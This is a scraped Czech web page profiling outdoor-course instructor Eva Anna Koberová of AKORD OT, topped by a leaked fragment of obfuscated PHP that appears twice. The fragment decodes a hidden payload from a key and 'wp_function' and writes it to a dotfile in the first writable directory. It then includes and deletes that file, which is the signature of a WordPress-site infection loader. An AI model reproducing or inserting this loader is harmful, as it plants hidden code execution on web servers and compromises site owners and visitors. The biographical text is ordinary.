100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Eva Anna Koberová - AKORD OT

je instruktorkou outdoorových kurzů a teamspiritových programů

  • s Akordem pravidelně spolupracuje od roku 2010, zejména na kurzech teambuildingových a teamspiritových, kterým dodává energii a šmrnc
  • vystudovala obor Dramatická výchova na Janáčkově akademii múzických umění v Brně, kde se zaměřovala na začlenění předmětu Dramatická výchova do vzdělávacích programů základních škol, 2005-2007 vyučovala na ZŠ Heyrovského 32, Brno
  • kromě interního vzdělávání lektorů AKORDu absolvovala kurzy Asertivity a Vedení pracovníků
  • v letech 2007 až 2010 pracovala jako hlavní manažer v projektech Holansportu v Praze a Brně. Stála za Výstavou stanů a Outdoor-Outletem - prodejní výstavy vybavení do přírody, kde uplatnila své organizační schopnosti a vytvářela prostor pro týmovou spolupráci
  • od roku 2013 v zimní sezóně pracuje v areálu Novako na Božím Daru jako instruktor lyžování, nejčastěji s malými začátečníky 3-6 let a předává zkušenosti novým instruktorům
  • letní sezóna je časem, kdy kromě outdoorových kurzů střídá školy v přírodě, letní tábory v jižních Čechách a příměstský tábor v Klánovicích pro CK Robinson
  • energii ji dodává pohyb v přírodě - vítr na horách, šumění řek, ticho vodní hladiny a večerní praskání ohně, ráda čte a nyní objevuje vzdušnou akrobacii na šálách